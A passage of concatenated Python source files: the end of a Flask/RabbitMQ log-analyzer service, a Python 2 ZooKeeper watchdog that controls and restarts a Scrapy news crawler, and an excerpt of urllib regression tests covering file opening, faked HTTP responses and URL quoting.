"binaryStoreType": os.getenv("ANALYZER_BINARYSTORE_TYPE", "minio"),
"minioBucketPrefix": os.getenv("ANALYZER_BINARYSTORE_BUCKETPREFIX", "prj-"),
"minioRegion": os.getenv("ANALYZER_BINARYSTORE_MINIO_REGION", None),
"instanceTaskType": os.getenv("INSTANCE_TASK_TYPE", "").strip(),
"filesystemDefaultPath": os.getenv("FILESYSTEM_DEFAULT_PATH", "storage").strip(),
"esChunkNumber": int(os.getenv("ES_CHUNK_NUMBER", "1000")),
"esProjectIndexPrefix": os.getenv("ES_PROJECT_INDEX_PREFIX", "").strip()
}
SEARCH_CONFIG = {
"MinShouldMatch": os.getenv("ES_MIN_SHOULD_MATCH", "80%"),
"BoostAA": float(os.getenv("ES_BOOST_AA", "-8.0")),
"BoostLaunch": float(os.getenv("ES_BOOST_LAUNCH", "4.0")),
"BoostUniqueID": float(os.getenv("ES_BOOST_UNIQUE_ID", "8.0")),
"MaxQueryTerms": int(os.getenv("ES_MAX_QUERY_TERMS", "50")),
"SearchLogsMinSimilarity": float(os.getenv("ES_LOGS_MIN_SHOULD_MATCH", "0.95")),
"ClusterLogsMinSimilarity": float(os.getenv("CLUSTER_LOGS_MIN_SHOULD_MATCH", "0.95")),
"MinWordLength": int(os.getenv("ES_MIN_WORD_LENGTH", "2")),
"TimeWeightDecay": float(os.getenv("ES_TIME_WEIGHT_DECAY", "0.95")),
"PatternLabelMinPercentToSuggest": float(os.getenv("PATTERN_LABEL_MIN_PERCENT", "0.9")),
"PatternLabelMinCountToSuggest": int(os.getenv("PATTERN_LABEL_MIN_COUNT", "5")),
"PatternMinCountToSuggest": int(os.getenv("PATTERN_MIN_COUNT", "10")),
"MaxLogsForDefectTypeModel": int(os.getenv("MAX_LOGS_FOR_DEFECT_TYPE_MODEL", "10000")),
"ProbabilityForCustomModelSuggestions": min(
0.8, float(os.getenv("PROB_CUSTOM_MODEL_SUGGESTIONS", "0.7"))),
"ProbabilityForCustomModelAutoAnalysis": min(
1.0, float(os.getenv("PROB_CUSTOM_MODEL_AUTO_ANALYSIS", "0.5"))),
"BoostModelFolder": "",
"SuggestBoostModelFolder": "",
"SimilarityWeightsFolder": "",
"GlobalDefectTypeModelFolder": "",
"RetrainSuggestBoostModelConfig": "",
"RetrainAutoBoostModelConfig": "",
"MaxSuggestionsNumber": int(os.getenv("MAX_SUGGESTIONS_NUMBER", "3")),
"AutoAnalysisTimeout": int(os.getenv("AUTO_ANALYSIS_TIMEOUT", "300")),
"MaxAutoAnalysisItemsToProcess": int(os.getenv("MAX_AUTO_ANALYSIS_ITEMS_TO_PROCESS", "4000"))
}
def create_application():
"""Creates a Flask application"""
_application = Flask(__name__)
return _application
def create_thread(func, args):
"""Creates a thread with specified function and arguments"""
thread = threading.Thread(target=func, args=args)
thread.start()
return thread
def declare_exchange(channel, config):
"""Declares exchange for rabbitmq"""
logger.info("ExchangeName: %s", config["exchangeName"])
try:
channel.exchange_declare(exchange=config["exchangeName"], exchange_type='direct',
durable=False, auto_delete=True, internal=False,
arguments={
"analyzer": config["exchangeName"],
"analyzer_index": config["analyzerIndex"],
"analyzer_priority": config["analyzerPriority"],
"analyzer_log_search": config["analyzerLogSearch"],
"analyzer_suggest": config["analyzerSuggest"],
"analyzer_cluster": config["analyzerCluster"],
"version": config["appVersion"], })
except Exception as err:
logger.error("Failed to declare exchange")
logger.error(err)
return False
logger.info("Exchange '%s' has been declared", config["exchangeName"])
return True
def init_amqp(_amqp_client):
"""Initialize rabbitmq queues, exchange and stars threads for queue messages processing"""
with _amqp_client.connection.channel() as channel:
try:
declare_exchange(channel, APP_CONFIG)
except Exception as err:
logger.error("Failed to declare amqp objects")
logger.error(err)
return
threads = []
_model_chooser = model_chooser.ModelChooser(APP_CONFIG, SEARCH_CONFIG)
if APP_CONFIG["instanceTaskType"] == "train":
_retraining_service = RetrainingService(_model_chooser, APP_CONFIG, SEARCH_CONFIG)
threads.append(create_thread(AmqpClient(APP_CONFIG["amqpUrl"]).receive,
(APP_CONFIG["exchangeName"], "train_models", True, False,
lambda channel, method, props, body:
amqp_handler.handle_inner_amqp_request(channel, method, props, body,
_retraining_service.train_models))))
else:
_es_client = EsClient(APP_CONFIG, SEARCH_CONFIG)
_auto_analyzer_service = AutoAnalyzerService(_model_chooser, APP_CONFIG, SEARCH_CONFIG)
_delete_index_service = DeleteIndexService(_model_chooser, APP_CONFIG, SEARCH_CONFIG)
_clean_index_service = CleanIndexService(APP_CONFIG, SEARCH_CONFIG)
_analyzer_service = AnalyzerService(_model_chooser, APP_CONFIG, SEARCH_CONFIG)
_suggest_service = SuggestService(_model_chooser, APP_CONFIG, SEARCH_CONFIG)
_suggest_info_service = SuggestInfoService(APP_CONFIG, SEARCH_CONFIG)
_search_service = SearchService(APP_CONFIG, SEARCH_CONFIG)
_cluster_service = ClusterService(APP_CONFIG, SEARCH_CONFIG)
_namespace_finder_service = NamespaceFinderService(APP_CONFIG, SEARCH_CONFIG)
_suggest_patterns_service = SuggestPatternsService(APP_CONFIG, SEARCH_CONFIG)
threads.append(create_thread(AmqpClient(APP_CONFIG["amqpUrl"]).receive,
(APP_CONFIG["exchangeName"], "index", True, False,
lambda channel, method, props, body:
amqp_handler.handle_amqp_request(channel, method, props, body,
_es_client.index_logs,
prepare_response_data=amqp_handler.
prepare_index_response_data))))
threads.append(create_thread(AmqpClient(APP_CONFIG["amqpUrl"]).receive,
(APP_CONFIG["exchangeName"], "analyze", True, False,
lambda channel, method, props, body:
amqp_handler.handle_amqp_request(channel, method, props, body,
_auto_analyzer_service.analyze_logs,
prepare_response_data=amqp_handler.
prepare_analyze_response_data))))
threads.append(create_thread(AmqpClient(APP_CONFIG["amqpUrl"]).receive,
(APP_CONFIG["exchangeName"], "delete", True, False,
lambda channel, method, props, body:
amqp_handler.handle_amqp_request(channel, method, props, body,
_delete_index_service.delete_index,
prepare_data_func=amqp_handler.
prepare_delete_index,
prepare_response_data=amqp_handler.
output_result))))
threads.append(create_thread(AmqpClient(APP_CONFIG["amqpUrl"]).receive,
(APP_CONFIG["exchangeName"], "clean", True, False,
lambda channel, method, props, body:
amqp_handler.handle_amqp_request(channel, method, props, body,
_clean_index_service.delete_logs,
prepare_data_func=amqp_handler.
prepare_clean_index,
prepare_response_data=amqp_handler.
output_result))))
threads.append(create_thread(AmqpClient(APP_CONFIG["amqpUrl"]).receive,
(APP_CONFIG["exchangeName"], "search", True, False,
lambda channel, method, props, body:
amqp_handler.handle_amqp_request(channel, method, props, body,
_search_service.search_logs,
prepare_data_func=amqp_handler.
prepare_search_logs,
prepare_response_data=amqp_handler.
prepare_analyze_response_data))))
threads.append(create_thread(AmqpClient(APP_CONFIG["amqpUrl"]).receive,
(APP_CONFIG["exchangeName"], "suggest", True, False,
lambda channel, method, props, body:
amqp_handler.handle_amqp_request(channel, method, props, body,
_suggest_service.suggest_items,
prepare_data_func=amqp_handler.
prepare_test_item_info,
prepare_response_data=amqp_handler.
prepare_analyze_response_data))))
threads.append(create_thread(AmqpClient(APP_CONFIG["amqpUrl"]).receive,
(APP_CONFIG["exchangeName"], "cluster", True, False,
lambda channel, method, props, body:
amqp_handler.handle_amqp_request(channel, method, props, body,
_cluster_service.find_clusters,
prepare_data_func=amqp_handler.
prepare_launch_info,
prepare_response_data=amqp_handler.
prepare_index_response_data))))
threads.append(create_thread(AmqpClient(APP_CONFIG["amqpUrl"]).receive,
(APP_CONFIG["exchangeName"], "stats_info", True, False,
lambda channel, method, props, body:
amqp_handler.handle_inner_amqp_request(channel, method, props, body,
_es_client.send_stats_info))))
threads.append(create_thread(AmqpClient(APP_CONFIG["amqpUrl"]).receive,
(APP_CONFIG["exchangeName"], "namespace_finder", True, False,
lambda channel, method, props, body:
amqp_handler.handle_amqp_request(channel, method, props, body,
_namespace_finder_service.update_chosen_namespaces,
publish_result=False))))
threads.append(create_thread(AmqpClient(APP_CONFIG["amqpUrl"]).receive,
(APP_CONFIG["exchangeName"], "suggest_patterns", True, False,
lambda channel, method, props, body:
amqp_handler.handle_amqp_request(channel, method, props, body,
_suggest_patterns_service.suggest_patterns,
prepare_data_func=amqp_handler.
prepare_delete_index,
prepare_response_data=amqp_handler.
prepare_index_response_data))))
threads.append(create_thread(AmqpClient(APP_CONFIG["amqpUrl"]).receive,
(APP_CONFIG["exchangeName"], "index_suggest_info", True, False,
lambda channel, method, props, body:
amqp_handler.handle_amqp_request(channel, method, props, body,
_suggest_info_service.index_suggest_info,
prepare_data_func=amqp_handler.
prepare_suggest_info_list,
prepare_response_data=amqp_handler.
prepare_index_response_data))))
threads.append(create_thread(AmqpClient(APP_CONFIG["amqpUrl"]).receive,
(APP_CONFIG["exchangeName"], "remove_suggest_info", True, False,
lambda channel, method, props, body:
amqp_handler.handle_amqp_request(channel, method, props, body,
_suggest_info_service.remove_suggest_info,
prepare_data_func=amqp_handler.
prepare_delete_index,
prepare_response_data=amqp_handler.
output_result))))
threads.append(create_thread(AmqpClient(APP_CONFIG["amqpUrl"]).receive,
(APP_CONFIG["exchangeName"], "update_suggest_info", True, False,
lambda channel, method, props, body:
amqp_handler.handle_amqp_request(channel, method, props, body,
_suggest_info_service.update_suggest_info,
prepare_data_func=lambda x: x))))
threads.append(create_thread(AmqpClient(APP_CONFIG["amqpUrl"]).receive,
(APP_CONFIG["exchangeName"], "remove_models", True, False,
lambda channel, method, props, body:
amqp_handler.handle_amqp_request(channel, method, props, body,
_analyzer_service.remove_models,
prepare_data_func=lambda x: x,
prepare_response_data=amqp_handler.
output_result))))
threads.append(create_thread(AmqpClient(APP_CONFIG["amqpUrl"]).receive,
(APP_CONFIG["exchangeName"], "get_model_info", True, False,
lambda channel, method, props, body:
amqp_handler.handle_amqp_request(channel, method, props, body,
_analyzer_service.get_model_info,
prepare_data_func=lambda x: x))))
threads.append(create_thread(AmqpClient(APP_CONFIG["amqpUrl"]).receive,
(APP_CONFIG["exchangeName"], "defect_update", True, False,
lambda channel, method, props, body:
amqp_handler.handle_amqp_request(channel, method, props, body,
_es_client.defect_update,
prepare_data_func=lambda x: x,
prepare_response_data=amqp_handler.
prepare_search_response_data))))
threads.append(create_thread(AmqpClient(APP_CONFIG["amqpUrl"]).receive,
(APP_CONFIG["exchangeName"], "item_remove", True, False,
lambda channel, method, props, body:
amqp_handler.handle_amqp_request(channel, method, props, body,
_clean_index_service.delete_test_items,
prepare_data_func=lambda x: x,
prepare_response_data=amqp_handler.
output_result))))
threads.append(create_thread(AmqpClient(APP_CONFIG["amqpUrl"]).receive,
(APP_CONFIG["exchangeName"], "launch_remove", True, False,
lambda channel, method, props, body:
amqp_handler.handle_amqp_request(channel, method, props, body,
_clean_index_service.delete_launches,
prepare_data_func=lambda x: x,
prepare_response_data=amqp_handler.
output_result))))
return threads
def read_version():
"""Reads the application build version"""
version_filename = "VERSION"
if os.path.exists(version_filename):
with open(version_filename, "r") as file:
return file.read().strip()
return ""
def read_model_settings():
"""Reads paths to models"""
model_settings = utils.read_json_file("", "model_settings.json", to_json=True)
SEARCH_CONFIG["BoostModelFolder"] = model_settings["BOOST_MODEL_FOLDER"]
SEARCH_CONFIG["SuggestBoostModelFolder"] = model_settings["SUGGEST_BOOST_MODEL_FOLDER"]
SEARCH_CONFIG["SimilarityWeightsFolder"] = model_settings["SIMILARITY_WEIGHTS_FOLDER"]
SEARCH_CONFIG["GlobalDefectTypeModelFolder"] = model_settings["GLOBAL_DEFECT_TYPE_MODEL_FOLDER"]
SEARCH_CONFIG["RetrainSuggestBoostModelConfig"] = model_settings["RETRAIN_SUGGEST_BOOST_MODEL_CONFIG"]
SEARCH_CONFIG["RetrainAutoBoostModelConfig"] = model_settings["RETRAIN_AUTO_BOOST_MODEL_CONFIG"]
log_file_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'logging.conf')
logging.config.fileConfig(log_file_path)
if APP_CONFIG["logLevel"].lower() == "debug":
logging.disable(logging.NOTSET)
elif APP_CONFIG["logLevel"].lower() == "info":
logging.disable(logging.DEBUG)
else:
logging.disable(logging.INFO)
logger = logging.getLogger("analyzerApp")
APP_CONFIG["appVersion"] = read_version()
es_client = EsClient(APP_CONFIG, SEARCH_CONFIG)
read_model_settings()
application = create_application()
CORS(application)
threads = []
@application.route('/', methods=['GET'])
def get_health_status():
status = ""
if not es_client.is_healthy(APP_CONFIG["esHost"]):
status += "Elasticsearch is not healthy;"
if status:
logger.error("Analyzer health check status failed: %s", status)
return Response(json.dumps({"status": status}), status=503, mimetype='application/json')
return jsonify({"status": "healthy"})
def handler(signal_received, frame):
print('The analyzer has stopped')
exit(0)
def start_http_server():
application.logger.setLevel(logging.INFO)
logger.info("Started http server")
application.run(host='0.0.0.0', port=5001, use_reloader=False)
signal(SIGINT, handler)
threads = []
logger.info("The analyzer has started")
while True:
try:
logger.info("Starting waiting for AMQP connection")
try:
amqp_client = AmqpClient(APP_CONFIG["amqpUrl"])
except Exception as err:
logger.error("Amqp connection was not established")
logger.error(err)
time.sleep(10)
continue
threads = init_amqp(amqp_client)
logger.info("Analyzer has started")
break
except Exception as err:
logger.error("The analyzer has failed")
logger.error(err)
if __name__ == '__main__':
logger.info("Program started")
start_http_server()
logger.info("The analyzer has finished")
exit(0)
|
watchdog.py
|
# -*- coding: utf-8 -*-
from kazoo.client import KazooClient
import os
import sys
import logging
import time
import signal
from multiprocessing import Process
main_dir = "/root/V3/project/"
signal_dir = '/signal/chinanews'
task_type = "chinanews"
def run_proc():
os.chdir(main_dir +"chinanews/chinanews/spiders")
#arg = ["HELLO","crawl", "spider_" + task_type,"--nolog"]
arg = ["HELLO","crawl", "spider_" + task_type]
os.execvp("scrapy",arg)
def run_wait(a,b):
try:
os.waitpid(-1, os.WNOHANG)
except Exception,e:
print "no child"
signal.signal(signal.SIGCHLD, run_wait)
watchPid = []
for i in range(1,len(sys.argv)):
watchPid.append(int(sys.argv[i]))
hosts_list = ['123.206.89.123:2181', '123.207.157.135:2181', '118.89.234.46:2181']
signal_dic = {"stop":signal.SIGKILL, "start":signal.SIGCONT, "pause":signal.SIGSTOP, "continue":signal.SIGCONT}
zk = KazooClient(hosts = hosts_list)
logging.basicConfig()
zk.start()
print "watch dog working"
stop_flag = False
@zk.ChildrenWatch(signal_dir)
def signal_watch(children):
if len(children) != 0:
global watchPid
for pid in watchPid:
os.kill(pid, signal_dic[children[0]])
if children[0] == "stop":
global stop_flag
stop_flag = True
def check(pid):
global stop_flag
if stop_flag == True:
sys.exit(0)
try:
os.kill(pid, 0)
return pid
except Exception: #判断
p = Process(target=run_proc)
p.start()
return p.pid
while True:
print "begin check"
global stop_flag
if stop_flag == True:
sys.exit(0)
for pid in watchPid:
newpid = check(pid)
if stop_flag == True:
sys.exit(0)
if newpid != pid:
print "new process"
watchPid.remove(pid)
watchPid.append(newpid)
time.sleep(5)
|
test_urllib.py
|
"""Regresssion tests for urllib"""
import urllib.parse
import urllib.request
import urllib.error
import http.client
import email.message
import io
import unittest
from test import support
import os
import sys
import tempfile
import warnings
import collections
def hexescape(char):
"""Escape char as RFC 2396 specifies"""
hex_repr = hex(ord(char))[2:].upper()
if len(hex_repr) == 1:
hex_repr = "0%s" % hex_repr
return "%" + hex_repr
# Shortcut for testing FancyURLopener
_urlopener = None
def urlopen(url, data=None, proxies=None):
"""urlopen(url [, data]) -> open file-like object"""
global _urlopener
if proxies is not None:
opener = urllib.request.FancyURLopener(proxies=proxies)
elif not _urlopener:
opener = urllib.request.FancyURLopener()
_urlopener = opener
else:
opener = _urlopener
if data is None:
return opener.open(url)
else:
return opener.open(url, data)
class urlopen_FileTests(unittest.TestCase):
"""Test urlopen() opening a temporary file.
Try to test as much functionality as possible so as to cut down on reliance
on connecting to the Net for testing.
"""
def setUp(self):
# Create a temp file to use for testing
self.text = bytes("test_urllib: %s\n" % self.__class__.__name__,
"ascii")
f = open(support.TESTFN, 'wb')
try:
f.write(self.text)
finally:
f.close()
self.pathname = support.TESTFN
self.returned_obj = urlopen("file:%s" % self.pathname)
def tearDown(self):
"""Shut down the open object"""
self.returned_obj.close()
os.remove(support.TESTFN)
def test_interface(self):
# Make sure object returned by urlopen() has the specified methods
for attr in ("read", "readline", "readlines", "fileno",
"close", "info", "geturl", "getcode", "__iter__"):
self.assertTrue(hasattr(self.returned_obj, attr),
"object returned by urlopen() lacks %s attribute" %
attr)
def test_read(self):
self.assertEqual(self.text, self.returned_obj.read())
def test_readline(self):
self.assertEqual(self.text, self.returned_obj.readline())
self.assertEqual(b'', self.returned_obj.readline(),
"calling readline() after exhausting the file did not"
" return an empty string")
def test_readlines(self):
lines_list = self.returned_obj.readlines()
self.assertEqual(len(lines_list), 1,
"readlines() returned the wrong number of lines")
self.assertEqual(lines_list[0], self.text,
"readlines() returned improper text")
def test_fileno(self):
file_num = self.returned_obj.fileno()
self.assertTrue(isinstance(file_num, int),
"fileno() did not return an int")
self.assertEqual(os.read(file_num, len(self.text)), self.text,
"Reading on the file descriptor returned by fileno() "
"did not return the expected text")
def test_close(self):
# Test close() by calling it hear and then having it be called again
# by the tearDown() method for the test
self.returned_obj.close()
def test_info(self):
self.assertTrue(isinstance(self.returned_obj.info(), email.message.Message))
def test_geturl(self):
self.assertEqual(self.returned_obj.geturl(), self.pathname)
def test_getcode(self):
self.assertIsNone(self.returned_obj.getcode())
def test_iter(self):
# Test iterator
# Don't need to count number of iterations since test would fail the
# instant it returned anything beyond the first line from the
# comparison
for line in self.returned_obj.__iter__():
self.assertEqual(line, self.text)
class ProxyTests(unittest.TestCase):
def setUp(self):
# Records changes to env vars
self.env = support.EnvironmentVarGuard()
# Delete all proxy related env vars
for k in list(os.environ):
if 'proxy' in k.lower():
self.env.unset(k)
def tearDown(self):
# Restore all proxy related env vars
self.env.__exit__()
del self.env
def test_getproxies_environment_keep_no_proxies(self):
self.env.set('NO_PROXY', 'localhost')
proxies = urllib.request.getproxies_environment()
# getproxies_environment use lowered case truncated (no '_proxy') keys
self.assertEqual('localhost', proxies['no'])
class urlopen_HttpTests(unittest.TestCase):
"""Test urlopen() opening a fake http connection."""
def fakehttp(self, fakedata):
class FakeSocket(io.BytesIO):
def sendall(self, str): pass
def makefile(self, *args, **kwds):
return self
def read(self, amt=None):
if self.closed: return b""
return io.BytesIO.read(self, amt)
def readline(self, length=None):
if self.closed: return b""
return io.BytesIO.readline(self, length)
class FakeHTTPConnection(http.client.HTTPConnection):
def connect(self):
self.sock = FakeSocket(fakedata)
self._connection_class = http.client.HTTPConnection
http.client.HTTPConnection = FakeHTTPConnection
def unfakehttp(self):
http.client.HTTPConnection = self._connection_class
def test_read(self):
self.fakehttp(b"Hello!")
try:
fp = urlopen("http://python.org/")
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
self.assertEqual(fp.geturl(), 'http://python.org/')
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_url_fragment(self):
# Issue #11703: geturl() omits fragments in the original URL.
url = 'http://docs.python.org/library/urllib.html#OK'
self.fakehttp(b'Hello!')
try:
fp = urllib.request.urlopen(url)
self.assertEqual(fp.geturl(), url)
finally:
self.unfakehttp()
def test_read_bogus(self):
# urlopen() should raise IOError for many error codes.
self.fakehttp(b'''HTTP/1.1 401 Authentication Required
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Type: text/html; charset=iso-8859-1
''')
try:
self.assertRaises(IOError, urlopen, "http://python.org/")
finally:
self.unfakehttp()
def test_invalid_redirect(self):
# urlopen() should raise IOError for many error codes.
self.fakehttp(b'''HTTP/1.1 302 Found
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Location: file://guidocomputer.athome.com:/python/license
Connection: close
Content-Type: text/html; charset=iso-8859-1
''')
try:
self.assertRaises(urllib.error.HTTPError, urlopen,
"http://python.org/")
finally:
self.unfakehttp()
def test_empty_socket(self):
# urlopen() raises IOError if the underlying socket does not send any
# data. (#1680230)
self.fakehttp(b'')
try:
self.assertRaises(IOError, urlopen, "http://something")
finally:
self.unfakehttp()
def test_userpass_inurl(self):
self.fakehttp(b"Hello!")
try:
fp = urlopen("http://user:pass@python.org/")
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
self.assertEqual(fp.geturl(), 'http://user:pass@python.org/')
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
class urlretrieve_FileTests(unittest.TestCase):
"""Test urllib.urlretrieve() on local files"""
def setUp(self):
# Create a list of temporary files. Each item in the list is a file
# name (absolute path or relative to the current working directory).
# All files in this list will be deleted in the tearDown method. Note,
# this only helps to makes sure temporary files get deleted, but it
# does nothing about trying to close files that may still be open. It
# is the responsibility of the developer to properly close files even
# when exceptional conditions occur.
self.tempFiles = []
# Create a temporary file.
self.registerFileForCleanUp(support.TESTFN)
self.text = b'testing urllib.urlretrieve'
try:
FILE = open(support.TESTFN, 'wb')
FILE.write(self.text)
FILE.close()
finally:
try: FILE.close()
except: pass
def tearDown(self):
# Delete the temporary files.
for each in self.tempFiles:
try: os.remove(each)
except: pass
def constructLocalFileUrl(self, filePath):
return "file://%s" % urllib.request.pathname2url(
os.path.abspath(filePath))
def createNewTempFile(self, data=b""):
"""Creates a new temporary file containing the specified data,
registers the file for deletion during the test fixture tear down, and
returns the absolute path of the file."""
newFd, newFilePath = tempfile.mkstemp()
try:
self.registerFileForCleanUp(newFilePath)
newFile = os.fdopen(newFd, "wb")
newFile.write(data)
newFile.close()
finally:
try: newFile.close()
except: pass
return newFilePath
def registerFileForCleanUp(self, fileName):
self.tempFiles.append(fileName)
def test_basic(self):
# Make sure that a local file just gets its own location returned and
# a headers value is returned.
result = urllib.request.urlretrieve("file:%s" % support.TESTFN)
self.assertEqual(result[0], support.TESTFN)
self.assertTrue(isinstance(result[1], email.message.Message),
"did not get a email.message.Message instance "
"as second returned value")
def test_copy(self):
# Test that setting the filename argument works.
second_temp = "%s.2" % support.TESTFN
self.registerFileForCleanUp(second_temp)
result = urllib.request.urlretrieve(self.constructLocalFileUrl(
support.TESTFN), second_temp)
self.assertEqual(second_temp, result[0])
self.assertTrue(os.path.exists(second_temp), "copy of the file was not "
"made")
FILE = open(second_temp, 'rb')
try:
text = FILE.read()
FILE.close()
finally:
try: FILE.close()
except: pass
self.assertEqual(self.text, text)
def test_reporthook(self):
# Make sure that the reporthook works.
def hooktester(count, block_size, total_size, count_holder=[0]):
self.assertTrue(isinstance(count, int))
self.assertTrue(isinstance(block_size, int))
self.assertTrue(isinstance(total_size, int))
self.assertEqual(count, count_holder[0])
count_holder[0] = count_holder[0] + 1
second_temp = "%s.2" % support.TESTFN
self.registerFileForCleanUp(second_temp)
urllib.request.urlretrieve(
self.constructLocalFileUrl(support.TESTFN),
second_temp, hooktester)
def test_reporthook_0_bytes(self):
# Test on zero length file. Should call reporthook only 1 time.
report = []
def hooktester(count, block_size, total_size, _report=report):
_report.append((count, block_size, total_size))
srcFileName = self.createNewTempFile()
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 1)
self.assertEqual(report[0][2], 0)
def test_reporthook_5_bytes(self):
# Test on 5 byte file. Should call reporthook only 2 times (once when
# the "network connection" is established and once when the block is
# read). Since the block size is 8192 bytes, only one block read is
# required to read the entire file.
report = []
def hooktester(count, block_size, total_size, _report=report):
_report.append((count, block_size, total_size))
srcFileName = self.createNewTempFile(b"x" * 5)
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 2)
self.assertEqual(report[0][1], 8192)
self.assertEqual(report[0][2], 5)
def test_reporthook_8193_bytes(self):
# Test on 8193 byte file. Should call reporthook only 3 times (once
# when the "network connection" is established, once for the next 8192
# bytes, and once for the last byte).
report = []
def hooktester(count, block_size, total_size, _report=report):
_report.append((count, block_size, total_size))
srcFileName = self.createNewTempFile(b"x" * 8193)
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 3)
self.assertEqual(report[0][1], 8192)
self.assertEqual(report[0][2], 8193)
class QuotingTests(unittest.TestCase):
"""Tests for urllib.quote() and urllib.quote_plus()
According to RFC 2396 (Uniform Resource Identifiers), to escape a
character you write it as '%' + <2 character US-ASCII hex value>.
The Python code of ``'%' + hex(ord(<character>))[2:]`` escapes a
character properly. Case does not matter on the hex letters.
The various character sets specified are:
Reserved characters : ";/?:@&=+$,"
Have special meaning in URIs and must be escaped if not being used for
their special meaning
Data characters : letters, digits, and "-_.!~*'()"
Unreserved and do not need to be escaped; can be, though, if desired
Control characters : 0x00 - 0x1F, 0x7F
Have no use in URIs so must be escaped
space : 0x20
Must be escaped
Delimiters : '<>#%"'
Must be escaped
Unwise : "{}|\^[]`"
Must be escaped
"""
def test_never_quote(self):
# Make sure quote() does not quote letters, digits, and "_,.-"
do_not_quote = '' .join(["ABCDEFGHIJKLMNOPQRSTUVWXYZ",
"abcdefghijklmnopqrstuvwxyz",
"0123456789",
"_.-"])
result = urllib.parse.quote(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote(): %r != %r" % (do_not_quote, result))
result = urllib.parse.quote_plus(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote_plus(): %r != %r" % (do_not_quote, result))
def test_default_safe(self):
# Test '/' is default value for 'safe' parameter
self.assertEqual(urllib.parse.quote.__defaults__[0], '/')
def test_safe(self):
# Test setting 'safe' parameter does what it should do
quote_by_default = "<>"
result = urllib.parse.quote(quote_by_default, safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote(): %r != %r" % (quote_by_default, result))
result = urllib.parse.quote_plus(quote_by_default,
safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote_plus(): %r != %r" %
(quote_by_default, result))
# Safe expressed as bytes rather than str
result = urllib.parse.quote(quote_by_default, safe=b"<>")
self.assertEqual(quote_by_default, result,
"using quote(): %r != %r" % (quote_by_default, result))
# "Safe" non-ASCII characters should have no effect
# (Since URIs are not allowed to have non-ASCII characters)
result = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="\xfc")
expect = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="")
self.assertEqual(expect, result,
"using quote(): %r != %r" %
(expect, result))
# Same as above, but using a bytes rather than str
result = urllib.parse.quote("a\xfcb", encoding="latin-1", safe=b"\xfc")
expect = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="")
self.assertEqual(expect, result,
"using quote(): %r != %r" %
(expect, result))
def test_default_quoting(self):
# Make sure all characters that should be quoted are by default sans
# space (separate test for that).
should_quote = [chr(num) for num in range(32)] # For 0x00 - 0x1F
should_quote.append('<>#%"{}|\^[]`')
should_quote.append(chr(127)) # For 0x7F
should_quote = ''.join(should_quote)
for char in should_quote:
result = urllib.parse.quote(char)
self.assertEqual(hexescape(char), result,
"using quote(): "
"%s should be escaped to %s, not %s" %
(char, hexescape(char), result))
result = urllib.parse.quote_plus(char)
self.assertEqual(hexescape(char), result,
"using quote_plus(): "
"%s should be escapes to %s, not %s" %
(char, hexescape(char), result))
del should_quote
partial_quote = "ab[]cd"
expected = "ab%5B%5Dcd"
result = urllib.parse.quote(partial_quote)
self.assertEqual(expected, result,
"using quote(): %r != %r" % (expected, result))
self.assertEqual(expected, result,
"using quote_plus(): %r != %r" % (expected, result))
def test_quoting_space(self):
# Make sure quote() and quote_plus() handle spaces as specified in
# their unique way
result = urllib.parse.quote(' ')
self.assertEqual(result, hexescape(' '),
"using quote(): %r != %r" % (result, hexescape(' ')))
result = urllib.parse.quote_plus(' ')
self.assertEqual(result, '+',
"using quote_plus(): %r != +" % result)
given = "a b cd e f"
expect = given.replace(' ', hexescape(' '))
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
expect = given.replace(' ', '+')
result = urllib.parse.quote_plus(given)
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
def test_quoting_plus(self):
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma'),
'alpha%2Bbeta+gamma')
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma', '+'),
'alpha+beta+gamma')
# Test with bytes
self.assertEqual(urllib.parse.quote_plus(b'alpha+beta gamma'),
'alpha%2Bbeta+gamma')
# Test with safe bytes
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma', b'+'),
'alpha+beta+gamma')
def test_quote_bytes(self):
# Bytes should quote directly to percent-encoded values
given = b"\xa2\xd8ab\xff"
expect = "%A2%D8ab%FF"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Encoding argument should raise type error on bytes input
self.assertRaises(TypeError, urllib.parse.quote, given,
encoding="latin-1")
# quote_from_bytes should work the same
result = urllib.parse.quote_from_bytes(given)
self.assertEqual(expect, result,
"using quote_from_bytes(): %r != %r"
% (expect, result))
def test_quote_with_unicode(self):
# Characters in Latin-1 range, encoded by default in UTF-8
given = "\xa2\xd8ab\xff"
expect = "%C2%A2%C3%98ab%C3%BF"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in Latin-1 range, encoded by with None (default)
result = urllib.parse.quote(given, encoding=None, errors=None)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in Latin-1 range, encoded with Latin-1
given = "\xa2\xd8ab\xff"
expect = "%A2%D8ab%FF"
result = urllib.parse.quote(given, encoding="latin-1")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
